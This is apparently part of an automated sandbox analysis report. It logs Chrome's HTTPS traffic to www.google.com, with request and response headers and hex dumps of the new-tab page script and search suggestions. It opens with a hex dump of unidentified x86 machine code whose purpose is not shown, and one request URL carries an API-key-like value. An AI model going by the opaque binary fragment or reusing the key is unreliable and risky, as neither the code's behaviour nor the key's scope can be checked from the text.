                                                                                                                                                                                                            2024-05-01 09:08:06 UTC1369INData Raw: 20 50 68 ec a2 40 00 53 ff 15 14 80 40 00 53 53 8d 44 24 24 53 50 53 ff 74 24 28 c7 44 24 34 01 00 00 00 c7 44 24 40 02 00 00 00 ff 15 00 80 40 00 6a 04 e8 1d 2e 00 00 3b c3 be 02 00 04 80 74 0c 56 6a 25 53 53 53 ff d0 85 c0 74 0d 56 6a 02 ff 15 4c 82 40 00 85 c0 75 07 6a 09 e8 3d da ff ff a1 0c 03 47 00 83 f8 ff 74 04 89 44 24 10 ff 74 24 10 ff 15 70 80 40 00 a1 18 a0 40 00 56 8b 35 20 81 40 00 83 f8 ff 74 0a 50 ff d6 83 0d 18 a0 40 00 ff a1 1c a0 40 00 83 f8 ff 74 0a 50 ff d6 83 0d 1c a0 40 00 ff e8 29 00 00 00 6a 07 68 00 90 4d 00 e8 d4 20 00 00 5e c3 56 8b 35 ec 66 43 00 eb 0a ff 74 24 08 ff 56 04 8b 36 59 85 f6 75 f2 5e c2 04 00 56 8b 35 ec 66 43 00 6a 00 e8 d7 ff ff ff 85 f6 74 1a 57 8b fe 8b 36 ff 77 08 ff 15 68 81 40 00 57 ff 15 28 81 40 00 85 f6
                                                                                                                                                                                                            Data Ascii: Ph@S@SSD$$SPSt$(D$4D$@@j.;tVj%SSStVjL@uj=GtD$t$p@@V5 @tP@@tP@)jhM ^V5fCt$V6Yu^V5fCjtW6wh@W(@


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            1192.168.2.449734142.251.16.1474438000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC518OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                                                                                            Sec-Fetch-Site: cross-site
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1479INHTTP/1.1 200 OK
                                                                                                                                                                                                            Version: 628208705
                                                                                                                                                                                                            Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:13 GMT
                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                            Cache-Control: private
                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1479INData Raw: 39 32 34 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 6c 61 6e 67 75 61 67 65 5f 63 6f 64 65 22 3a 22 65 6e 2d 55 53 22 2c 22 6f 67 62 22 3a 7b 22 68 74 6d 6c 22 3a 7b 22 70 72 69 76 61 74 65 5f 64 6f 5f 6e 6f 74 5f 61 63 63 65 73 73 5f 6f 72 5f 65 6c 73 65 5f 73 61 66 65 5f 68 74 6d 6c 5f 77 72 61 70 70 65 64 5f 76 61 6c 75 65 22 3a 22 5c 75 30 30 33 63 68 65 61 64 65 72 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 52 61 20 67 62 5f 69 62 20 67 62 5f 55 64 20 67 62 5f 6f 64 5c 22 20 69 64 5c 75 30 30 33 64 5c 22 67 62 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 61 6e 6e 65 72 5c 22 20 73 74 79 6c 65 5c 75 30 30 33 64 5c 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 74 72 61 6e 73 70 61 72 65 6e 74 5c 22 5c 75 30 30 33 65 5c
                                                                                                                                                                                                            Data Ascii: 924)]}'{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ra gb_ib gb_Ud gb_od\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC868INData Raw: 33 64 5c 22 67 62 5f 4a 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 61 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 39 64 20 67 62 5f 4b 63 20 67 62 5f 37 64 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 47 6f 6f 67 6c 65 5c 22 20 68 72 65 66 5c 75 30 30 33 64 5c 22 2f 3f 74 61 62 5c 75 30 30 33 64 72 72 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 73 70 61 6e 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4f 63 20 67 62 5f 36 64 5c 22 20 61 72 69 61 2d 68 69 64 64 65 6e 5c 75 30 30 33 64 5c 22 74 72 75 65 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f
                                                                                                                                                                                                            Data Ascii: 3d\"gb_Jc\"\u003e\u003ca class\u003d\"gb_9d gb_Kc gb_7d\" aria-label\u003d\"Google\" href\u003d\"/?tab\u003drr\"\u003e\u003cspan class\u003d\"gb_Oc gb_6d\" aria-hidden\u003d\"true\" role\u003d\"presentation\"\u003e\u003c\/span\u003e\u003c\/a\u003e\u003c\/
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC700INData Raw: 32 62 35 0d 0a 6d 2f 6d 61 69 6c 2f 3f 74 61 62 5c 75 30 30 33 64 72 6d 5c 75 30 30 32 36 61 6d 70 3b 6f 67 62 6c 5c 22 20 74 61 72 67 65 74 5c 75 30 30 33 64 5c 22 5f 74 6f 70 5c 22 5c 75 30 30 33 65 47 6d 61 69 6c 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4b 20 67 62 5f 4c 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 61 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 4a 5c 22 20 61 72 69 61 2d 6c 61 62 65 6c 5c 75 30 30 33 64 5c 22 53 65 61 72 63 68 20 66 6f 72 20 49 6d 61 67 65 73 20 28 6f 70 65 6e 73 20 61 20 6e 65 77 20 74 61 62 29 5c 22 20 64 61 74 61 2d 70 69 64 5c 75 30 30 33 64 5c 22 32 5c 22 20 68 72 65 66 5c 75 30
                                                                                                                                                                                                            Data Ascii: 2b5m/mail/?tab\u003drm\u0026amp;ogbl\" target\u003d\"_top\"\u003eGmail\u003c\/a\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_K gb_L\"\u003e\u003ca class\u003d\"gb_J\" aria-label\u003d\"Search for Images (opens a new tab)\" data-pid\u003d\"2\" href\u0
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 38 30 30 30 0d 0a 65 5c 75 30 30 33 64 6e 74 70 5c 22 20 74 61 72 67 65 74 5c 75 30 30 33 64 5c 22 5f 74 6f 70 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 62 75 74 74 6f 6e 5c 22 20 74 61 62 69 6e 64 65 78 5c 75 30 30 33 64 5c 22 30 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 73 76 67 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 67 5c 22 20 66 6f 63 75 73 61 62 6c 65 5c 75 30 30 33 64 5c 22 66 61 6c 73 65 5c 22 20 68 65 69 67 68 74 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 20 76 69 65 77 42 6f 78 5c 75 30 30 33 64 5c 22 30 20 2d 39 36 30 20 39 36 30 20 39 36 30 5c 22 20 77 69 64 74 68 5c 75 30 30 33 64 5c 22 32 34 70 78 5c 22 5c 75 30 30 33 65 20 5c 75 30 30 33 63 70 61 74 68 20 64 5c 75 30 30 33 64 5c 22 4d 32 30 39 2d 31 32 30 71 2d 34 32 20 30
                                                                                                                                                                                                            Data Ascii: 8000e\u003dntp\" target\u003d\"_top\" role\u003d\"button\" tabindex\u003d\"0\"\u003e \u003csvg class\u003d\"gb_g\" focusable\u003d\"false\" height\u003d\"24px\" viewBox\u003d\"0 -960 960 960\" width\u003d\"24px\"\u003e \u003cpath d\u003d\"M209-120q-42 0
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 36 2c 32 30 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 36 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39 2c 2d 32 20 2d 32 2c 2d 32 20 2d 32 2c 30 2e 39 20 2d 32 2c 32 20 30 2e 39 2c 32 20 32 2c 32 7a 4d 31 32 2c 31 34 63 31 2e 31 2c 30 20 32 2c 2d 30 2e 39 20 32 2c 2d 32 73 2d 30 2e 39
                                                                                                                                                                                                            Data Ascii: 0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM6,20c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM6,14c1.1,0 2,-0.9 2,-2s-0.9,-2 -2,-2 -2,0.9 -2,2 0.9,2 2,2zM12,14c1.1,0 2,-0.9 2,-2s-0.9
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 2d 68 69 64 64 65 6e 5c 75 30 30 33 64 5c 22 74 72 75 65 5c 22 20 72 6f 6c 65 5c 75 30 30 33 64 5c 22 70 72 65 73 65 6e 74 61 74 69 6f 6e 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 73 70 61 6e 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 61 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 64 69 76 20 63 6c 61 73 73 5c 75 30 30 33 64 5c 22 67 62 5f 33 63 5c 22 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 5c 75 30 30 33 63 5c 2f 64 69 76 5c 75 30 30 33 65 22 7d 2c 22 6c 65 66 74 5f 70 72 6f 64 75 63 74 5f 63 6f 6e 74 72 6f 6c 5f 70 6c 61 63 65 68 6f 6c 64 65 72 5f 6c 61 62 65 6c 22 3a 5b 22 6c
                                                                                                                                                                                                            Data Ascii: -hidden\u003d\"true\" role\u003d\"presentation\"\u003e\u003c\/span\u003e\u003c\/a\u003e\u003c\/div\u003e\u003c\/div\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_3c\"\u003e\u003c\/div\u003e\u003c\/div\u003e"},"left_product_control_placeholder_label":["l
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 73 74 65 6e 65 72 28 5c 22 74 65 73 74 5c 22 2c 63 2c 62 29 7d 63 61 74 63 68 28 63 29 7b 7d 72 65 74 75 72 6e 20 61 7d 28 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78 63 65 70 74 69 6f 6e 28 65 29 7d 5c 6e 74 72 79 7b 5c 6e 76 61 72 20 6d 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 2e 67 62 5f 6b 20 2e 67 62 5f 64 5c 22 29 2c 6e 64 5c 75 30 30 33 64 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 5c 22 23 67 62 2e 67 62 5f 5a 63 5c 22 29 3b 6d 64 5c 75 30 30 32 36 5c 75 30 30 32 36 21 6e 64 5c 75 30 30 32 36 5c 75 30 30 32 36 5f 2e 6b 64 28 5f 2e 56 63 2c 6d 64 2c 5c 22 63 6c 69 63 6b 5c 22 29 3b 5c 6e 7d 63 61 74 63 68 28 65 29 7b 5f 2e 5f 44 75 6d 70 45 78
                                                                                                                                                                                                            Data Ascii: stener(\"test\",c,b)}catch(c){}return a}();\n}catch(e){_._DumpException(e)}\ntry{\nvar md\u003ddocument.querySelector(\".gb_k .gb_d\"),nd\u003ddocument.querySelector(\"#gb.gb_Zc\");md\u0026\u0026!nd\u0026\u0026_.kd(_.Vc,md,\"click\");\n}catch(e){_._DumpEx
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 77 20 79 64 28 62 5c 75 30 30 33 64 5c 75 30 30 33 65 62 2e 73 75 62 73 74 72 28 30 2c 61 2e 6c 65 6e 67 74 68 2b 31 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 61 2b 5c 22 3a 5c 22 29 7d 3b 5c 6e 5f 2e 42 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 5c 75 30 30 33 64 5f 2e 41 64 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 77 64 29 72 65 74 75 72 6e 20 61 3b 66 6f 72 28 6c 65 74 20 63 5c 75 30 30 33 64 30 3b 63 5c 75 30 30 33 63 62 2e 6c 65 6e 67 74 68 3b 2b 2b 63 29 7b 63 6f 6e 73 74 20 64 5c 75 30 30 33 64 62 5b 63 5d 3b 69 66 28 64 20 69 6e 73 74 61 6e 63 65 6f 66 20 79 64 5c 75 30 30 32 36 5c 75 30 30 32 36 64 2e 59 67 28 61 29 29 72 65 74 75 72 6e 20 6e 65 77 20 5f 2e
                                                                                                                                                                                                            Data Ascii: w yd(b\u003d\u003eb.substr(0,a.length+1).toLowerCase()\u003d\u003d\u003da+\":\")};\n_.Bd\u003dfunction(a,b\u003d_.Ad){if(a instanceof _.wd)return a;for(let c\u003d0;c\u003cb.length;++c){const d\u003db[c];if(d instanceof yd\u0026\u0026d.Yg(a))return new _.
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 30 33 64 61 2e 6c 61 73 74 49 6e 64 65 78 4f 66 28 62 2c 30 29 7d 3b 5f 2e 4e 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 41 72 72 61 79 2e 70 72 6f 74 6f 74 79 70 65 2e 73 6f 6d 65 2e 63 61 6c 6c 28 61 2c 62 2c 76 6f 69 64 20 30 29 7d 3b 74 72 79 7b 28 6e 65 77 20 73 65 6c 66 2e 4f 66 66 73 63 72 65 65 6e 43 61 6e 76 61 73 28 30 2c 30 29 29 2e 67 65 74 43 6f 6e 74 65 78 74 28 5c 22 32 64 5c 22 29 7d 63 61 74 63 68 28 61 29 7b 7d 3b 76 61 72 20 4f 64 3b 5f 2e 50 64 5c 75 30 30 33 64 66 75 6e 63 74 69 6f 6e 28 29 7b 76 6f 69 64 20 30 5c 75 30 30 33 64 5c 75 30 30 33 64 5c 75 30 30 33 64 4f 64 5c 75 30 30 32 36 5c 75 30 30 32 36 28 4f 64 5c 75 30 30 33 64 5f 2e 4c 64 28 5c 22 6f 67 62 2d 71 74 6d 23 68 74 6d 6c 5c 22
                                                                                                                                                                                                            Data Ascii: 03da.lastIndexOf(b,0)};_.Nd\u003dfunction(a,b){return Array.prototype.some.call(a,b,void 0)};try{(new self.OffscreenCanvas(0,0)).getContext(\"2d\")}catch(a){};var Od;_.Pd\u003dfunction(){void 0\u003d\u003d\u003dOd\u0026\u0026(Od\u003d_.Ld(\"ogb-qtm#html\"
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1255INData Raw: 5c 5d 2d 7e 5d 2a 5c 5c 5c 22 7c 5b 21 23 2d 5c 75 30 30 32 36 2a 2d 5c 5c 5c 5c 5b 5c 5c 5c 5c 5d 2d 7e 5d 2a 29 28 5b 20 5c 5c 74 5c 5c 6e 5d 2a 5c 5c 5c 5c 29 29 5c 22 2c 5c 22 67 5c 22 29 3b 5f 2e 24 64 5c 75 30 30 33 64 52 65 67 45 78 70 28 5c 22 5c 5c 5c 5c 62 28 63 61 6c 63 7c 63 75 62 69 63 2d 62 65 7a 69 65 72 7c 66 69 74 2d 63 6f 6e 74 65 6e 74 7c 68 73 6c 7c 68 73 6c 61 7c 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 7c 6d 61 74 72 69 78 7c 6d 69 6e 6d 61 78 7c 72 61 64 69 61 6c 2d 67 72 61 64 69 65 6e 74 7c 72 65 70 65 61 74 7c 72 67 62 7c 72 67 62 61 7c 28 72 6f 74 61 74 65 7c 73 63 61 6c 65 7c 74 72 61 6e 73 6c 61 74 65 29 28 58 7c 59 7c 5a 7c 33 64 29 3f 7c 73 74 65 70 73 7c 76 61 72 29 5c 5c 5c 5c 28 5b 2d 2b 2a 2f 30 2d 39 61 2d 7a 41 2d
                                                                                                                                                                                                            Data Ascii: \]-~]*\\\"|[!#-\u0026*-\\\\[\\\\]-~]*)([ \\t\\n]*\\\\))\",\"g\");_.$d\u003dRegExp(\"\\\\b(calc|cubic-bezier|fit-content|hsl|hsla|linear-gradient|matrix|minmax|radial-gradient|repeat|rgb|rgba|(rotate|scale|translate)(X|Y|Z|3d)?|steps|var)\\\\([-+*/0-9a-zA-


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            2192.168.2.449737142.251.16.1474438000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC615OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                                                                            Host: www.google.com
                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                            X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiUocsBCJz+zAEIhaDNAQjcvc0BCJDKzQEIucrNAQii0c0BCIrTzQEIntbNAQin2M0BCPnA1BUY9snNARi60s0BGOuNpRc=
                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                            Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1703INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Wed, 01 May 2024 09:08:13 GMT
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            Expires: -1
                                                                                                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                            Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                            Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-ZUTeVFXGY6ssCH-4qff7pA' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                            Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                            Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                            Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                            Permissions-Policy: unload=()
                                                                                                                                                                                                            Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                                                                            Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                                                                            Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                            Server: gws
                                                                                                                                                                                                            X-XSS-Protection: 0
                                                                                                                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                            Accept-Ranges: none
                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1703INData Raw: 62 37 65 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 73 74 75 64 65 6e 74 20 6c 6f 61 6e 73 22 2c 22 66 61 6c 6c 6f 75 74 20 6e 65 78 74 20 67 65 6e 20 75 70 64 61 74 65 22 2c 22 73 6f 75 74 68 77 65 73 74 20 61 69 72 6c 69 6e 65 73 20 66 6c 69 67 68 74 73 22 2c 22 6a 6f 73 65 20 61 62 72 65 75 20 68 6f 75 73 74 6f 6e 20 61 73 74 72 6f 73 22 2c 22 77 77 65 20 6e 78 74 20 73 70 72 69 6e 67 20 62 72 65 61 6b 69 6e 22 2c 22 65 6d 6f 74 69 6f 6e 61 6c 20 73 75 70 70 6f 72 74 20 61 6c 6c 69 67 61 74 6f 72 20 77 61 6c 6c 79 22 2c 22 6e 79 74 20 63 72 6f 73 73 77 6f 72 64 20 63 6c 75 65 73 22 2c 22 64 6a 20 6d 6f 6f 72 65 20 6f 6e 20 63 61 6c 65 62 20 77 69 6c 6c 69 61 6d 73 22 5d 2c 5b 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 2c 22 22 5d 2c 5b 5d
                                                                                                                                                                                                            Data Ascii: b7e)]}'["",["student loans","fallout next gen update","southwest airlines flights","jose abreu houston astros","wwe nxt spring breakin","emotional support alligator wally","nyt crossword clues","dj moore on caleb williams"],["","","","","","","",""],[]
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC1246INData Raw: 46 56 55 31 6d 54 45 4a 36 4f 44 6c 45 55 57 52 33 56 69 39 68 5a 6d 4e 58 4d 6d 6f 32 4d 55 78 6a 65 58 68 35 52 30 39 68 52 30 35 77 54 7a 63 32 4e 55 70 4c 4e 55 68 7a 62 33 4a 52 61 48 68 4b 57 55 70 4c 52 45 56 79 55 30 38 77 5a 31 5a 4e 53 6e 6b 30 56 54 64 69 4b 32 52 4e 53 47 6c 74 51 32 45 76 4d 58 55 35 64 47 52 61 56 56 4e 4a 4e 6d 59 77 59 32 70 44 62 55 78 50 55 6d 6f 77 53 6e 67 32 4d 57 38 72 61 6a 68 4b 54 47 4a 68 61 6a 4d 77 65 46 4a 6f 52 7a 56 4a 51 6b 64 53 61 6b 63 7a 64 6d 35 34 4c 30 5a 53 64 48 68 79 4d 48 4e 73 57 44 52 79 65 43 39 43 64 32 52 74 55 30 74 50 53 46 68 6a 54 47 68 75 64 55 68 4d 5a 6b 46 34 4c 30 5a 69 59 6c 4e 32 4e 45 56 31 64 46 4a 48 64 6c 52 58 4f 58 52 50 65 54 4a 44 63 58 70 35 65 48 4e 42 56 6c 70 7a 53 30
                                                                                                                                                                                                            Data Ascii: FVU1mTEJ6ODlEUWR3Vi9hZmNXMmo2MUxjeXh5R09hR05wTzc2NUpLNUhzb3JRaHhKWUpLREVyU08wZ1ZNSnk0VTdiK2RNSGltQ2EvMXU5dGRaVVNJNmYwY2pDbUxPUmowSng2MW8rajhKTGJhajMweFJoRzVJQkdSakczdm54L0ZSdHhyMHNsWDRyeC9Cd2RtU0tPSFhjTGhudUhMZkF4L0ZiYlN2NEV1dFJHdlRXOXRPeTJDcXp5eHNBVlpzS0
                                                                                                                                                                                                            2024-05-01 09:08:13 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            3192.168.2.449736142.251.16.1474438000C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
